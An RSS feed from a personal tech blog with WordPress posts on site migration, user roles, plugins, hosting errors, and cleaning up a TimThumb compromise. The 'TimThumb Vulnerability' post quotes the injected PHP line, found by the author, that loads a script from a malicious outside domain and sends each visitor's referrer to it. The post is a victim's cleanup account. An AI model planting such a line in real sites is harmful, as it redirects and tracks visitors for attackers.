<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>eBabble &#187; WordPress</title>
	<atom:link href="http://www.ebabble.net/tag/wordpress/feed" rel="self" type="application/rss+xml" />
	<link>http://www.ebabble.net</link>
	<description>Random thoughts on key interests, since 1999.</description>
	<lastBuildDate>Thu, 02 Feb 2012 12:09:25 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<atom:link rel='hub' href='http://www.ebabble.net/?pushpress=hub'/>
		<item>
		<title>Compromised By TimThumb</title>
		<link>http://tech.ebabble.net/compromised-by-timthumb</link>
		<comments>http://tech.ebabble.net/compromised-by-timthumb#comments</comments>
		<pubDate>Fri, 26 Aug 2011 18:05:51 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[Sucuri]]></category>
		<category><![CDATA[timthumb]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=2376</guid>
		<description><![CDATA[After updating the theme of the compromised site, removing TimThumb completely and  the site I look after still had issues.  I hadn&#8217;t noticed but other users were getting warnings in Chrome and being redirected to various affiliate sites.  The worst was that the site seemed to have been removed from Google so the hits dropped rapidly.
I spotted the redirect going to counter-wordpress.com and then did some internet searching, which brought me to a great thread about cleaning it up.  Using Sucuri SiteCheck I was directed to the source of ...]]></description>
			<content:encoded><![CDATA[<p>After updating the theme of the compromised site, removing TimThumb completely and <a href="http://tech.ebabble.net/timthumb-vulnerability">following clean up procedures</a> the site I look after still had issues.  I hadn&#8217;t noticed but other users were getting warnings in Chrome and being redirected to various affiliate sites.  The worst was that the site seemed to have been removed from Google so the hits dropped rapidly.</p>
<p>I spotted the redirect going to counter-wordpress.com and then did some internet searching, which brought me to a <a href="https://wordpress.org/support/topic/malware-counter-wordpresscom-warning-on-chrome" target="_blank">great thread</a> about cleaning it up.  Using <a href="http://sitecheck.sucuri.net/scanner/" target="_blank">Sucuri SiteCheck</a> I was directed to the source of the redirects, /wp-includes/js/l10n.js, a Java script that was planted through the TimThumb vulnerability.  I deleted the file and re-ran Sucuri SiteCheck and this time nothing was found.  Sigh of relief.</p>
<p>A little more digging on the Sucuri website lead me to a custom WordPress <a href="http://blog.sucuri.net/2011/08/timthumb-php-security-vulnerability-just-the-tip-of-the-iceberg.html" target="_blank">PHP file</a> that can be uploaded and ran to test your WordPress site out.  All in all a very helpful resource.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/compromised-by-timthumb/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>TimThumb Vulnerability</title>
		<link>http://tech.ebabble.net/timthumb-vulnerability</link>
		<comments>http://tech.ebabble.net/timthumb-vulnerability#comments</comments>
		<pubDate>Mon, 15 Aug 2011 18:15:46 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[timthumb]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=2372</guid>
		<description><![CDATA[As I read through my tech news a few weeks ago I took note of a TimThumb vulnerability that allowed bad people to do bad things to your website.  Recommended solution was to replace TimThumb.php with the latest version available online.  A lot of WordPress themes use TimThumb to auto resize images for front pages and the like.  Shortly thereafter I received an email from Elegant Themes advising to update all their themes to the latest version which now did not employ TimThumb, then make sure TimThumb.php and it&#8217;s cache ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">As I read through my tech news a few weeks ago I took note of a TimThumb vulnerability that allowed bad people to do bad things to your website.  Recommended solution was to replace <a title="TimThumb.php latest" href="https://timthumb.googlecode.com/svn/trunk/timthumb.php" target="_blank">TimThumb.php</a> with the latest version available online.  A lot of WordPress themes use TimThumb to auto resize images for front pages and the like.  Shortly thereafter I received an email from <a href="http://www.elegantthemes.com/affiliates/idevaffiliate.php?id=8820_0_1_3" target="_blank">Elegant Themes</a> advising to update all their themes to the latest version which now did not employ TimThumb, then make sure TimThumb.php and it&#8217;s cache folder were deleted.  I made a not to get those things done.</p>
<p style="text-align: justify;">Unfortunately one of the sites I look after had already been affected, so when I went through the upgrade procedures everything seemed fine but I had a popunder ad the next day.  Some Google searches didn&#8217;t reveal much so I needed more information.  I checked the page source in my browser and noticed this line at the bottom outside the HTML tag:</p>
<p><code>echo '&lt;script type="text/javascript" language="javascript" src="http://superpuperdomain2.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"&gt;&lt;/script&gt;';</code></p>
<p style="text-align: justify;">A Google search brought me to TECHspheria and their excellent <a href="http://techspheria.com/2011/08/phpremoteview-hack-what-it-is-and-how-to-remove-it/" target="_blank">removal instructions</a>.  Changing all your passwords after something like this is a great idea as well.  Scary business.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/timthumb-vulnerability/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Pending Post Notifier</title>
		<link>http://tech.ebabble.net/wordpress-pending-post-notifier</link>
		<comments>http://tech.ebabble.net/wordpress-pending-post-notifier#comments</comments>
		<pubDate>Thu, 04 Nov 2010 18:29:59 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[notification]]></category>
		<category><![CDATA[pending]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=1751</guid>
		<description><![CDATA[After implementing individual user accounts on WordPress contributors now submitted their posts for review and an editor reviews and posts it.  Unfortunately there isn&#8217;t an automated notification built into WordPress to let editors know there&#8217;s a post waiting.  Luckily there&#8217;s a plugin for that: Pending Post Notifier.

It&#8217;s very straightforward: enter the email addresses separated by a comma in the Notification Receiver box.
]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">After implementing individual user accounts on WordPress contributors now submitted their posts for review and an editor reviews and posts it.  Unfortunately there isn&#8217;t an automated notification built into WordPress to let editors know there&#8217;s a post waiting.  Luckily there&#8217;s a plugin for that: <a title="Pending Post Notifier" href="http://plugins.fixwordpress.net/wp-pending-post-notifier" target="_blank" class="broken_link">Pending Post Notifier</a>.</p>
<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/Pending-Post-Notifications.jpg" rel="lightbox[1751]"><img class="size-medium wp-image-1752 aligncenter" title="Pending Post Notifications" src="http://www.ebabble.net/wp-content/uploads/Pending-Post-Notifications-300x99.jpg" alt="" width="300" height="99" /></a></p>
<p style="text-align: justify;">It&#8217;s very straightforward: enter the email addresses separated by a comma in the Notification Receiver box.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/wordpress-pending-post-notifier/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Options Page</title>
		<link>http://tech.ebabble.net/wordpress-options-page</link>
		<comments>http://tech.ebabble.net/wordpress-options-page#comments</comments>
		<pubDate>Thu, 28 Oct 2010 18:18:11 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[hidden]]></category>
		<category><![CDATA[options]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=1720</guid>
		<description><![CDATA[The WordPress site I was working on had an issue with images: if the option to link to file, File URL, wasn&#8217;t clicked when adding the image it would default incorrectly to the post and clicking on an image would result in a 404 error.  This was annoying since multiple contributors were adding posts and images and while you can tell people how to do things there are some who never follow directions.

Multiple internet searches led me to a WordPress options page that doesn&#8217;t show up on the menu at ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">The WordPress site I was working on had an issue with images: if the option to link to file, File URL, wasn&#8217;t clicked when adding the image it would default incorrectly to the post and clicking on an image would result in a 404 error.  This was annoying since multiple contributors were adding posts and images and while you can tell people how to do things there are some who never follow directions.</p>
<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/WordPress-Options-Page.png" rel="lightbox[1720]"><img class="size-medium wp-image-1721 aligncenter" title="WordPress Options Page" src="http://www.ebabble.net/wp-content/uploads/WordPress-Options-Page-300x147.png" alt="" width="300" height="147" /></a></p>
<p style="text-align: justify;">Multiple internet searches led me to a WordPress options page that doesn&#8217;t show up on the menu at all: enter www.sitename/wp-admin/options.php in your browser and you&#8217;re confronted with All Settings.  That&#8217;s right, every setting for WordPress and it&#8217;s plugins all in one page.</p>
<p style="text-align: justify;">It&#8217;s alphabetically listed so I went to <code>image_default_link_type </code>and entered File as the option, scrolled to the bottom and clicked Save Changes.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/wordpress-options-page/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress User Role Capabilities</title>
		<link>http://tech.ebabble.net/wordpress-user-role-capabilities</link>
		<comments>http://tech.ebabble.net/wordpress-user-role-capabilities#comments</comments>
		<pubDate>Wed, 27 Oct 2010 17:52:00 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[capability manager]]></category>
		<category><![CDATA[permissions]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[users]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=1717</guid>
		<description><![CDATA[I&#8217;ve been working on a WordPress powered website recently, implementing a lot of features.  The first item was to stop everyone using the admin login and create unique logins for everyone with properly assigned roles.  Here&#8217;s how WordPress breaks down roles:

 Super Admin &#8211; Someone with access to the blog network administration features controlling the entire network (See Create a Network).
 Administrator &#8211; Somebody who has access to all the administration features
 Editor &#8211; Somebody who can publish and manage posts and pages as well as manage other users&#8217; posts, ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">I&#8217;ve been working on a WordPress powered website recently, implementing a lot of features.  The first item was to stop everyone using the admin login and create unique logins for everyone with properly assigned roles.  Here&#8217;s how <a title="Wordpress.org Roles" href="http://codex.wordpress.org/Roles_and_Capabilities" target="_blank">WordPress</a> breaks down roles:</p>
<ul>
<li> <a title="Super Admin Menu" href="http://codex.wordpress.org/Super_Admin_Menu">Super Admin</a> &#8211; Someone with access to the blog network administration features controlling the entire network (<a title="Create A Network" href="http://codex.wordpress.org/Create_A_Network">See Create a Network</a>).</li>
<li> <a href="http://codex.wordpress.org/Roles_and_Capabilities#Administrator">Administrator</a> &#8211; Somebody who has access to all the administration features</li>
<li> <a href="http://codex.wordpress.org/Roles_and_Capabilities#Editor">Editor</a> &#8211; Somebody who can publish and manage posts and pages as well as manage other users&#8217; posts, etc.</li>
<li> <a href="http://codex.wordpress.org/Roles_and_Capabilities#Author">Author</a> &#8211; Somebody who can publish and manage their own posts</li>
<li> <a href="http://codex.wordpress.org/Roles_and_Capabilities#Contributor">Contributor</a> &#8211; Somebody who can write and manage their posts but not publish them</li>
<li> <a href="http://codex.wordpress.org/Roles_and_Capabilities#Subscriber">Subscriber</a> &#8211; Somebody who can only manage their profile</li>
</ul>
<p style="text-align: justify;">Regular writers were assigned as Contributors, but for some reason that level can&#8217;t add images.  Since they can&#8217;t publish their own articles I didn&#8217;t see the harm in allowing Contributors to add images but not delete or modify the media library.</p>
<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/Capability-Manager.jpg" rel="lightbox[1717]"><img class="size-medium wp-image-1718 aligncenter" title="Capability Manager" src="http://www.ebabble.net/wp-content/uploads/Capability-Manager-300x274.jpg" alt="" width="300" height="274" /></a></p>
<p style="text-align: justify;">A quick internet search led me to <a title="Capability Manager plugin" href="http://wordpress.org/extend/plugins/capsman/" target="_blank">Capability Manager</a>, a WordPress plugin that allows you to modify or create user roles.  As you can see in the image I opened the Contributor role and checked &#8220;Upload Files&#8221; and selected &#8220;Level 1&#8243;.  This is a great plugin that allows infinite customization and creation of WordPress roles.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/wordpress-user-role-capabilities/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Moving WordPress</title>
		<link>http://tech.ebabble.net/moving-wordpress</link>
		<comments>http://tech.ebabble.net/moving-wordpress#comments</comments>
		<pubDate>Thu, 24 Jun 2010 19:17:28 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[1&1]]></category>
		<category><![CDATA[hosting]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=1284</guid>
		<description><![CDATA[I&#8217;ve been running two WordPress sites for several years on 1 &#38; 1 web hosting.  Last year I made a major restructuring of eBabble and in doing so created a new SQL 5 database to keep it separate.  Early this year on eBabble Art I received an error when trying to upgrade WordPress past 2.8.2: that was the last version that would work on a SQL 4 database.  It wasn&#8217;t a big deal so I left it at version 2.8.2 and kept going.

With WordPress 3.0 released I decided to finally move eBabble Art to a new ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">I&#8217;ve been running two WordPress sites for several years on 1 &amp; 1 web hosting.  Last year I made a major restructuring of eBabble and in doing so created a new SQL 5 database to keep it separate.  Early this year on eBabble Art I received an error when trying to upgrade WordPress past 2.8.2: that was the last version that would work on a SQL 4 database.  It wasn&#8217;t a big deal so I left it at version 2.8.2 and kept going.</p>
<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/wordpress-logo-stacked-rgb1.png" rel="lightbox[1284]"><img class="aligncenter size-medium wp-image-1285" title="wordpress-logo-stacked-rgb" src="http://www.ebabble.net/wp-content/uploads/wordpress-logo-stacked-rgb1-300x186.png" alt="" width="300" height="186" /></a></p>
<p style="text-align: justify;">With <a href="http://wordpress.org/development/2010/06/thelonious/" target="_blank">WordPress 3.0</a> released I decided to finally move <a href="http://art.ebabble.net" target="_blank">eBabble Art</a> to a new SQL 5 database and WordPress 3.  I searched around and found lots of directions for moving a site to a new database but decided to go my own route.  Here are the steps I performed:</p>
<ol>
<li>created a new folder on my host called comicart</li>
<li>created a new SQL 5 database on 1 &amp; 1</li>
<li>installed WordPress 3.0</li>
<li>installed my plugins</li>
<li>copied my theme folder</li>
<li>configured widgets</li>
<li>changed permalink, links and media</li>
<li>copied my images folder that contains all my uploads</li>
<li>exported eBabble Art, edited XML file and imported it to comicart</li>
<li>checked every page to make sure all the images were displaying</li>
<li>redirected subdomain art.ebabble.net to comicart folder</li>
<li>configure plugins</li>
</ol>
<p style="text-align: justify;">It looks very straightforward and it was.  I made a new folder on my host and installed WordPress so I could run the old site and the new site concurrently, comparing settings so everything would be the same.  Plus I didn&#8217;t have to worry about losing any files or experiencing any real downtime.  I installed the plugins but didn&#8217;t activate or configure most of them since the domain would be changing from www.ebabble.net/comicart to art.ebabble.net once everything was ready.</p>
<p style="text-align: justify;">1 &amp; 1 has a feature called WebSpaceExplorer (yes there are no spaces) that lets you create a Zip file of a folder and have it on your host.  This let me Zip up my images folder, move it to comicart and then upzip the folder, all without having to copy things via FTP to my PC and back again.  Very nice.</p>
<p style="text-align: justify;">I copied my theme folder over since I had made changes to the header and footer and didn&#8217;t want to do it again; why do the work again when you don&#8217;t have to.  I recreated my widget layout, links list without incident but when it came to permalinks I received an error saying .htaccess wasn&#8217;t writable and I would have to manually edit it: the text was provided and again illustrated that WordPress is a very user friendly platform.  Unfortunately my .htaccess was writable and no amount of checking and tinkering could get my permalink settings changed within WordPress so I bit the bullet and manually made the changes.</p>
<p style="text-align: justify;">Exporting and importing is very simple and covered the bulk of my site: posts, pages, comments.  WordPress 3 makes you install an importer plugin first which is new for me since it was built in before, but I&#8217;m getting ahead.  Once I had the XML export file I opened it in Notepad and did some replace text.  Most of my images linked to http://art.ebabble.net/images but some were to http://www.ebabble.net/art/images so I replaced all those.  As well I had manually added rel=&#8221;lightbox&#8221; to the images and I replaced that with a space as I wanted a plugin to handle that automatically.</p>
<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/WordPress-media-settings.png" rel="lightbox[1284]"><img class="aligncenter size-medium wp-image-1286" title="WordPress media settings" src="http://www.ebabble.net/wp-content/uploads/WordPress-media-settings-300x98.png" alt="" width="300" height="98" /></a></p>
<p style="text-align: justify;">Until now I had manually created my thumbnail images: it started when WordPress way back when didn&#8217;t handle images well and just continued.  This time around I wanted WordPress to handle it for me.  My thumbnails were 200 pixels at their largest, either width or height, and my main images were 800 pixels at their largest.  I didn&#8217;t need medium sized images so I set those to 0 and unchecked crop thumbnails to exact dimensions.  A few test uploads showed everything was working as I wanted it.</p>
<p style="text-align: justify;">Wandering through every page showed a few images that didn&#8217;t seem to get my replace text properly but it wasn&#8217;t that many and the fix was quick: adding in <a href="http://art.ebabble.net">http://art.ebabble.net</a> to each image property.</p>
<p style="text-align: justify;">Redirecting the subdomain was very easy with 1 &amp; 1 and was working within two minutes.  At that point I needed to change the General settings in WordPress to reflect the domain of the site was now <a href="http://art.ebabble.net">http://art.ebabble.net</a> and not http://www.ebabble.net/comicart anymore.  Quick testing showed I needed to change the .htaccess file again, manually again!  Configured the plugins and my new WordPress 3 installation using SQL 5 was done.  The new site looked the same as the old, all links were the same but I was now up to date and didn&#8217;t have to manually edit and create so many image files.  All told it took me about 1.5 hours: well worth it.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/moving-wordpress/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Backupify with 1&amp;1</title>
		<link>http://tech.ebabble.net/backupify-with-11</link>
		<comments>http://tech.ebabble.net/backupify-with-11#comments</comments>
		<pubDate>Mon, 25 Jan 2010 17:20:26 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[1&1]]></category>
		<category><![CDATA[backupify]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=999</guid>
		<description><![CDATA[Backupify is a new online service that backs up your online services and is free to sign up until January 31st 2010.  They provide backup services built on Amazon&#8217;s Web Services and supports a range of services including WordPress, Blogger, Twitter, Facebook, Flickr, Google Docs and many more.  Since you can never have too many backups and free is the magic price I signed up.

I was mostly interested in backing up WordPress since I have this site and art.ebabble.net.  It seemed simple enough: add a plug-in and validate the account.  ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Backupify is a new online service that backs up your online services and is free to sign up until January 31st 2010.  They provide backup services built on Amazon&#8217;s Web Services and supports a range of services including WordPress, Blogger, Twitter, Facebook, Flickr, Google Docs and many more.  Since you can never have too many backups and free is the magic price I signed up.</p>
<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/backupify-logo.gif" rel="lightbox[999]"><img class="size-full wp-image-1000 aligncenter" title="backupify-logo" src="http://www.ebabble.net/wp-content/uploads/backupify-logo.gif" alt="" width="210" height="68" /></a></p>
<p style="text-align: justify;">I was mostly interested in backing up WordPress since I have this site and <a title="eBabble Art" href="http://art.ebabble.net" target="_blank">art.ebabble.net</a>.  It seemed simple enough: add a plug-in and validate the account.  I did that but received the same errors each day in the Backupify History page, a nice idea that shows what happened with your account.  Here&#8217;s my error:</p>
<p style="text-align: justify;"><em>Perhaps too low php memory limit on http://www.ebabble.net for  backup all files. We recommend 64M and more. Also install last version  wp-backupify plugin and reregister</em></p>
<p style="text-align: justify;">No comment on the grammar and punctuation.  The plug-in version I installed from Backupify was 1.8 but they now offered a 1.0.3 version.  Installed that but still received the low memory error.  A little searching showed you can try to increase your PHP memory by creating a php.ini file with one line:</p>
<p style="text-align: justify;"><code>memory_limit = 64M</code></p>
<p style="text-align: justify;">Unfortunately I had the same issue so I poked around the 1&amp;1 website and <a title="1&amp;1 PHP Memory limit" href="http://faq.1and1.com/scripting_languages_supported/php/9.html" target="_blank">found</a> that they set a limit of 20 MB for PHP so it looks like I&#8217;m out of luck for now.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/backupify-with-11/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress 2.8 Released</title>
		<link>http://tech.ebabble.net/wordpress-2-8-released</link>
		<comments>http://tech.ebabble.net/wordpress-2-8-released#comments</comments>
		<pubDate>Fri, 12 Jun 2009 18:49:32 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=750</guid>
		<description><![CDATA[
This site is made possible because of WordPress.  I had started eBabble.net with NetObjects Fusion many years ago but wanted to move to a platform that would let me add and edit content from anywhere.  My first attempts were with CMS platforms but I couldn&#8217;t get the hang of them and somehow managed to stumble upon WordPress.  With every version it becomes easier to use and the plugin community grows: you can pretty much accomplish whatever you&#8217;d like with WordPress.
With version 2.8 WordPress has made three big ease of use ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.ebabble.net/wp-content/uploads/wordpress-logo-stacked-rgb.png" rel="lightbox[750]"><img class="size-medium wp-image-752 aligncenter" title="wordpress-logo-stacked-rgb" src="http://www.ebabble.net/wp-content/uploads/wordpress-logo-stacked-rgb-300x186.png" alt="wordpress-logo-stacked-rgb" width="300" height="186" /></a></p>
<p style="text-align: justify;">This site is made possible because of <a title="WordPress" href="http://www.wordpress.org" target="_blank">WordPress</a>.  I had started eBabble.net with NetObjects Fusion many years ago but wanted to move to a platform that would let me add and edit content from anywhere.  My first attempts were with CMS platforms but I couldn&#8217;t get the hang of them and somehow managed to stumble upon WordPress.  With every version it becomes easier to use and the plugin community grows: you can pretty much accomplish whatever you&#8217;d like with WordPress.</p>
<p style="text-align: justify;">With version 2.8 WordPress has made three big ease of use changes.  Themes can now be searched for, previewed and installed right from the Dashboard.  The Widget system has been completely redesigned for ease of use; you can now have multiple widgets of the same type and can save widgets not in use.  Finally you can customize every Dashboard page via Screen Options for improved column support.  Full details and a great video are available at the <a title="WordPress blog" href="http://wordpress.org/development/2009/06/wordpress-28/" target="_blank">WordPress blog</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/wordpress-2-8-released/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WordPress Error 500 on 1&amp;1 Web Hosting</title>
		<link>http://tech.ebabble.net/wordpress-error-500-on-11-web-hosting</link>
		<comments>http://tech.ebabble.net/wordpress-error-500-on-11-web-hosting#comments</comments>
		<pubDate>Thu, 02 Apr 2009 17:13:59 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[1&1]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/?p=661</guid>
		<description><![CDATA[Early this week one of my plugins had an upgrade available but when I clicked to upgrade automatically I received the following: Error 500 &#8211; Internal Server Error.  Didn&#8217;t give it much thought and tried to log into this site last night and after entering my credentials received the same error: now it was serious.
Searching for the error uncovered one possible fix indicating PHP is running out of memory.  To increase on an ISP that doesn&#8217;t give direct access to PHP is to create a PHP.INI file with this line ...]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Early this week one of my plugins had an upgrade available but when I clicked to upgrade automatically I received the following: Error 500 &#8211; Internal Server Error.  Didn&#8217;t give it much thought and tried to log into this site last night and after entering my credentials received the same error: now it was serious.</p>
<p style="text-align: justify;">Searching for the error uncovered one possible fix indicating PHP is running out of memory.  To increase on an ISP that doesn&#8217;t give direct access to PHP is to create a PHP.INI file with this line as the only content:</p>
<p style="text-align: justify;">memory=20MB</p>
<p style="text-align: justify;">I did this and gained access back to my WordPress Dashboard.  Checked the plugins and still received Error 500 trying to update.  More searching gave another option: edit the .HTACCESS file and add the following line to force PHP5 usage instead of PHP4.</p>
<p style="text-align: justify;">AddType x-mapp-php5 .php</p>
<p style="text-align: justify;">This allowed the plugin to be upgraded.  I then removed the PHP.INI file and everything was still working well.</p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/wordpress-error-500-on-11-web-hosting/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>WordPress 2.1</title>
		<link>http://tech.ebabble.net/wordpress-21</link>
		<comments>http://tech.ebabble.net/wordpress-21#comments</comments>
		<pubDate>Thu, 25 Jan 2007 15:41:14 +0000</pubDate>
		<dc:creator>Scott VanderPloeg</dc:creator>
				<category><![CDATA[Technology]]></category>
		<category><![CDATA[software]]></category>
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://www.ebabble.net/wordpress-21.htm</guid>
		<description><![CDATA[I&#8217;ve just updated my sites with WordPress 2.1 and I&#8217;m impressed with the changes.  Little things here and there, plus notables like major editor reworking and autosave.  If you&#8217;re running a WordPress site update now to version 2.1 and enjoy the free software.
WordPress 2.1
]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">I&#8217;ve just updated my sites with WordPress 2.1 and I&#8217;m impressed with the changes.  Little things here and there, plus notables like major editor reworking and autosave.  If you&#8217;re running a WordPress site update now to version 2.1 and enjoy the free software.</p>
<p style="text-align: justify;"><a title="WordPress 2.1" href="http://wordpress.org/development/2007/01/ella-21/" target="_blank">WordPress 2.1</a></p>
]]></content:encoded>
			<wfw:commentRss>http://tech.ebabble.net/wordpress-21/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

